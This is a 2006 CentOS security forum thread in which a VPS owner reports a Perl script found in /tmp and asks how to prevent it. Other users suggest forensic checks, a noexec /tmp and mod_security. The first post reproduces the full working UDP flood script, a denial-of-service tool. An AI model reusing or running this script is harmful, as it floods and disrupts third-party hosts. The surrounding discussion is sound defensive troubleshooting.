/tmp folder was attacked

Support for security such as Firewalls and securing linux
Post Reply
Dante
Posts: 3
Joined: 2006/09/21 12:21:45

/tmp folder was attacked

Post by Dante » 2006/09/21 12:31:42

Hello

i have a VPS solutions running on a centOS 4.3 OS. yesterday i saw on "top" displaying information that some perl script is overloading my CPU and memory. I kill twice that proces and i found in /tmp folder a .txt file containing the following code:

[code]#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "Distrugem ip - Flood - Made By Andos\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
[/code]

it seems that is a flood script.

Questions:

1. how can I protect my /tmp folder to prevent writtng of this kind of files?
2. if the answer on q1 was: a script which can search and erase malicious scripts, then where i can find something like this?
3. it is normal to be able to writte on /tmp folder in any conditions? or it's just a hole on my VPS?

if there is someone who can help me, i will allays love she/him/it :))))

thanks and best regards

Dante

foxb
Posts: 1924
Joined: 2006/04/20 19:03:33
Location: Montreal/QC

Re: /tmp folder was attacked

Post by foxb » 2006/09/21 13:43:26

First see who did this (ls -l should give you user name) and warn him/her. Also see the account running the script.

You need to find a way to stop programs executing from /tmp

Did you check your system for backdoor??

Dante
Posts: 3
Joined: 2006/09/21 12:21:45

Re: /tmp folder was attacked

Post by Dante » 2006/09/21 13:53:21

hello

the process is running by nobody

how can i see that backdoor?

regard and thanks

stephan
Posts: 17
Joined: 2006/09/07 01:05:48
Contact:

Re: /tmp folder was attacked

Post by stephan » 2006/09/21 15:39:59

Hi,

Good places to check for this kind of thing are:

/var/tmp
/tmp
and
/dev/shm

Sometimes it's possible to grab the process number

(from top, or "ps aux|grep whatever")

then type:

cat /proc/Process_number_goes_here/environ

It will sometimes show you how the exploit was done. Checking log files is also a good bet, but sometimes the exploit will have been running for quite a while before you notice.

The most common way I have found that this happens is through a security flaw in a script. What you need to do is check through all your websites and make sure you don't have any outdated ones. You can sign up to the "bugtraq" mailing list at securityfocus.com to get e-mailed about the latest insecure scripts.

1. how can I protect my /tmp folder to prevent writtng of this kind of files?

You can try mounting it so that it's not executable. I haven't done this personally, but if you search the forums something should come up. I'm not sure how effective this is, as some people just put text files and stuff in /tmp, I'm not sure if they run it from there most of the time.

2. if the answer on q1 was: a script which can search and erase malicious scripts, then where i can find something like this?

I don't know of one :-(

3. it is normal to be able to writte on /tmp folder in any conditions? or it's just a hole on my VPS?

I think /tmp has to be writeable for storing temporary stuff, but it's probably a hole in a script on a website you are hosting.

I hope that helps.



* editing, just to add, if you do get the process number, you can do:

lsof -p Process_Number
to show what files it's using.

K_Frye
Posts: 425
Joined: 2005/07/13 01:48:35
Location: Canada

Re: /tmp folder was attacked

Post by K_Frye » 2006/09/26 04:53:48

[quote]
Dante wrote:
Hello

i have a VPS solutions running on a centOS 4.3 OS. yesterday i saw on "top" displaying information that some perl script is overloading my CPU and memory. I kill twice that proces and i found in /tmp folder a .txt file containing the following code:

Questions:

1. how can I protect my /tmp folder to prevent writtng of this kind of files?
[/quote]

If you're running Apache, consider installing mod_security and using the GotRoot ruleset:

http://www.gotroot.com/mod_security+rules
http://www.gotroot.com/tiki-index.php?page=Setup+of+mod_security

Post Reply

Return to “CentOS 4 - Security Support”